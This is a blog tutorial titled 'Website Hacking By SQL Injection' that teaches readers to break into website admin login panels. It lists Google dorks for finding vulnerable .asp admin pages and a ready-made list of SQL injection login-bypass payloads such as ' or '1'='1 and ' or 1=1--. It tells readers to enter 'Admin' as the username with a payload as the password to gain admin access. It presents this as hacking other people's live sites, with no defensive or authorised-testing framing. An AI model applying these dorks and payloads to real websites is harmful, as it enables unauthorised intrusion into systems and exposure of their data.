Website Hacking By SQL Injection
Sql injection (aka Sql Injection or Structured Query Language Injection) is the first step in the entry to exploiting or hacking websites. It is easily done and it is a great starting off point.
How to Hack Website Admin Login Panel
How to Hack website using sql injection
Introduction:
Hello every one .
I am going to share with one of the best of my tutorials here .
Now Let's begin!!
Unfortunately most sqli tutorials suck, so that is why I am writing this one. Sqli is just basically injecting queries into a database or using queries to get authorization bypass as an admin.
Things you should know :
Data is in the columns and the columns are in tables and the tables are in the database .
Just remember that so you understand the rest .
PART1:BY PASS LOGIN
Gaining auth bypass on an admin account.
Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:
Code:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"the site should look something like this :
ADMIN USERNAME :
PASSWORD :
so what we do here is in the username we always type "Admin"
and for our password we type our sql injection
here is a list of sql injections
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'username:Admin
password:'or'1'='1
that will confuse the site and give you authorisation to enter as admin.
Union SQL Injection Tutorial...watch this union sql injection tutorial
Important Links: How to hack website using sql injection | sql injection tutorial | sql injection ebook tutorial | advance sql injection hacking | union sql injection | error based sql injection | time based sql injection | blind sql injection | all sql injection advance tutorial | sql injection video tutorial
| learn SQL injection | How to hack website using sql injection | how to hack website using sqli | how to hack webiste using sqli dumper
| how to hack webiste using sqlmap | how to hack website using havij
No comments
Post a Comment
Note: only a member of this blog may post a comment.